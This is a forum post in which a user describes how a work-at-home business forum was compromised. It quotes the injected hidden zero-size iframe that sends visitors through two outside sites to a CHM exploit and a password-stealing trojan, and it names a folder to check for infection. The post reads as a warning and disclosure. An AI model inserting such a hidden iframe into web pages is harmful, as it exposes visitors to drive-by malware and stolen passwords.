ceint said:
I have checked the phpbb forum and can not find any evidence that it is from there you got it.
Let me break it down for you then because I do a bit of work in this area.
NOTE No one should visit these sites with an activeX enabled IE.
Your forum page calls this page in an iframe
http://howtoloseweight.frsa.com/index.php
that page forwards to another page
http://www.chercher.org/1.htm
via another iframe that then loads a chm exploit and installs a trojan that will pick up system passwords.
This is the section of the code that does it
Code:
<span class="gen">Work At Home Business Forums - Let's Talk Business...<iframe src="[url="http://howtoloseweight.frsa.com/index.php"]http://howtoloseweight.frsa.com/index.php[/url]" height="0" width="0" frameborder="1"></iframe></span></B></FONT></P>
Now i've checked this on 3 PCs from various locations using a variety of browsers and they all show the same. I have checked in google cache and guess what the code is in there as well so it's not just me. So the code is in there, now the question is: how did it get there?
Again I state anyone who has visited those forums check your windows\system32\ folder for a folder called mset, your passwords may have been compromised.
If any other IT person would like to dispute my claims or back them up please feel free to do so.
The google cache is from the 26th of April so not fresh
http://66.102.7.104/search?q=cache:9uonHz_IQwkJ:www.homebusiness.us.com/forum/+&hl=en
do a view source and ctrl+f for "iframe" no quotes. Then check out the site it forwards once, then hits chercher.org and tries to run the exploit.